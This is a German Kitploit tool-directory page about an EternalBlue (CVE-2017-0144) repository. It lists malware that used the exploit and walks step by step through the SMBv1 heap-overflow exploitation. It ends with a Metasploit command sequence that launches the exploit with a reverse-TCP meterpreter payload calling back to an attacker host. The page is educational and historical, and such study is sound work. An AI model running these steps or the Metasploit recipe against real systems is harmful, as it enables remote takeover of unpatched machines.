Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blackash-CVE-2017-0144 — CVE-2017-0144 | Kitploit
Tools/GitHubGitHub/firetemple/blackash-cve-2017-0144
SchwachstellenanalyseExploitationForensikMalware-AnalysePenetrationstestsBedrohungsanalyseEinbruchserkennungLernen & BildungKuratierte Ressourcen
GitHubfiretemple/blackash-cve-2017-0144

Blackash-CVE-2017-0144

CVE-2017-0144

161vor 10 MonatenNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🌐 CVE-2017-0144 — EternalBlue: Schwachstelle zur Remotecodeausführung in Microsoft Windows SMBv1

EternalBlue

"Ein Exploit. Dutzende Malware-Familien. Milliarden Schaden."


🔍 Zusammenfassung in einem Satz

CVE-2017-0144 ist eine kritische Schwachstelle zur Remotecodeausführung in der SMBv1-Serverimplementierung von Microsoft Windows. Der als EternalBlue bekannte Exploit nutzte diese Lücke aus und wurde bei Angriffen mit schwerwiegenden Auswirkungen (insbesondere WannaCry) eingesetzt.


🔥 Top 10 Malware, die EternalBlue nutzt (detailliert)

#MalwareTypErstmals gesehenAkteurSchadenAnmerkungen
1WannaCryRansomwareMay 12, 2017Lazarus Group (DPRK)$4–8BKillswitch: iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
2NotPetyaWiper (Als Ransomware getarnt)Jun 27, 2017Sandworm (Russland)$10B+Nutzt Mimikatz + EternalBlue + PSEXEC
3Bad RabbitRansomwareOct 24, 2017Indrik SpiderRegionalDrive-by mit gefälschtem Flash-Update
4UiwixRansomwareMay 2017UnbekanntNiedrigKein Killswitch, unauffälliger als WannaCry
5EternalRocksWurmMay 2017UnbekanntMittel7 NSA-Tools (inkl. DoublePulsar)
6AdylkuzzCryptominerMay 2017UnbekanntHoch (still)Mine Monero vor WannaCry
7RetefeBanking-Trojaner2017–2018UnbekanntEU-BankenNutzt EternalBlue für laterale Bewegung
8TrickBotModulare Malware2017–2021Wizard SpiderGlobalDrop von Ryuk über EternalBlue
9EmotetLoader2017–2021TA542GlobalWird als Einstieg für Cobalt Strike genutzt
10Clop / DridexRansomware2019–2025TA505Gesundheitswesen, RegierungNoch 2025 aktiv

🧨 Entwicklung des EternalBlue-Exploits

eternelblue1
ToolVeröffentlichungFunktionen
EternalBlue (Original)Apr 2017 (Shadow Brokers)SMBv1 RCE
DoublePulsarApr 2017Backdoor-Implantat (ring0)
EternalRomanceApr 2017SMBv3-Variante
EternalChampionApr 2017Alternativer SMB-Pfad
Metasploit-ModulMay 2017exploit/windows/smb/ms17_010_eternalblue
FuzzBunchApr 2017NSA-Exploit-Framework
Impacket + PSEXEC2017–2025Python-SMB-Exploitation
eternelblue2

🔍 Wie CVE-2017-0144 (EternalBlue) ausgenutzt wurde

Ein schrittweiser technischer Deep Dive in die SMBv1 RCE

"Ein fehlerhaftes Paket. Vollständiger SYSTEM-Zugriff. Keine Anmeldung. Kein Klick."


🎯 TL;DR Exploit-Ablauf

[Angreifer] 
   │
   ├──▶ Sendet manipulierten SMBv1 **Trans2**-Request
   │       → Löst **Heap-Überlauf** in `srv!SrvOS2FeaListSizeToNt` aus
   │
   ├──▶ Überschreibt Funktionszeiger → **Kernel-Shellcode**
   │
   └──▶ Führt **DoublePulsar**-Backdoor aus → **Ring-0-Payload**
           (z.B. WannaCry `mssecsvc.exe`)

🛠️ Voraussetzungen für die Ausnutzung

AnforderungDetails
ZielWindows mit aktiviertem SMBv1 (Standard vor Win10)
Offener Port445/TCP (oder 139/TCP über NetBIOS)
Keine AuthentifizierungUnauthentifiziert — kein Benutzername/Passwort nötig
Architekturx86 oder x64 (beide unterstützt)
Patch-StatusUngepatcht (vor MS17-010)

🚀 Exploit-Phasen (7 Schritte)

Phase 1: SMB-Protokollverhandlung

SMB_COM_NEGOTIATE → Client sendet Dialektliste
Server antwortet: SMBv1 unterstützt → Weiter

Warum? Bestätigt, dass SMBv1 aktiv ist.


Phase 2: Tree Connect zu IPC$

eternelblue3
\\TARGET\IPC$ → Anonymer Share für SMB-Pipes

Zweck: Stellt eine Sitzung zum Senden von Transaktionsanfragen her.


Phase 3: Trans2-Session-Setup (primär)

  • Verwendet SMB_COM_TRANSACTION2 (0x32)
  • Unterbefehl: SESSION_SETUP
  • Richtet FEALIST-Struktur mit fehlerhafter Größe ein
FEALIST {
    SizeOfListInBytes = 0xFFFF (oder großer Wert)
    ...
}

Bug-Trigger: SrvOS2FeaListSizeToNt() vertraut dieser Größe ohne Grenzprüfung.


Phase 4: Sekundäre Trans2-Anfrage (Überlauf)

  • Sendet mehrere sekundäre Pakete
  • Jedes enthält überdimensionierte FEALIST + FEA (Datei-erweiterte Attribute)
eternelblue4
FEA {
    AttributeNameLength = 0x00
    AttributeName = "A" * 0x1000  → Pufferüberlauf
}

Heap Spray: Alloziert große Blöcke, um Speicherlayout zu kontrollieren.


Phase 5: Pufferüberlauf im Kernel

srv!SrvOS2FeaListSizeToNt(
    PFEALIST FeaList,      // vom Angreifer kontrolliert
    PULONG pNtFeaListSize  // Ausgabezeiger
)
{
    // Keine Validierung von FeaList->SizeOfListInBytes
    memcpy(dest, src, FeaList->SizeOfListInBytes);  // BOOM
}

Ergebnis:

  • Heap-Überlauf → Überschreiben benachbarter Kernel-Objekte
  • Ziel: SRVNET_BUFFER oder POOL_HEADER
  • Überschreiben von Funktionszeigern (z. B. Free-Routine)

Phase 6: Kernel-Shellcode-Ausführung

  • Angreifer kontrolliert RIP/EIP über überschriebenen Funktionszeiger
  • Springt zu Shellcode im Non-Paged-Pool

Shellcode tut:

  1. Ring-0 → Ring-3-Übergang (über KeUserModeCallback)
  2. Alloziert User-Mode-Speicher
  3. Lädt/Staged Payload (z. B. mssecsvc.exe)
  4. Installiert DoublePulsar-Backdoor

Phase 7: DoublePulsar-Backdoor-Implantat

eternelblue6
  • Injiziert Kernel-Treiber (0x00120034 XOR-Key)
  • Horcht auf magische SMB-Pakete:
    • Ping: 0x0002C001
    • Exec: 0x0002C002 + Payload

WannaCry-Beispiel:

EternalBlue → DoublePulsar → mssecsvc.exe → tasksche.exe → Verschlüsselt Dateien

🧨 Exploit-Paketstruktur (vereinfacht)

SMB-Header
└── Befehl: 0x32 (TRANSACTION2)
    └── Setup: 0x000E (SESSION_SETUP)
        └── Parameter: TotalDataCount = 0x1000
            └── Daten: 
                [FEALIST]
                  SizeOfListInBytes = 0x1100
                  [FEA #1] NameLen=0, Name="A"*0x1000
                  [FEA #2] ...
                [GROOM x100] → Spray Heap
                [OVERFLOW] → Überschreibe Pool
                [SHELLCODE] → x64 ring0

🛠️ Reale Exploit-Tools

ToolSpracheModul
MetasploitRubyexploit/windows/smb/ms17_010_eternalblue
ImpacketPythonsmbclient.py, psexec.py
FuzzBunchPython (NSA)EternalBlue-2.2.0
Benutzerdefiniertes C2C/C++WannaCry, NotPetya

Metasploit-Beispiel

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

Tool herunterladen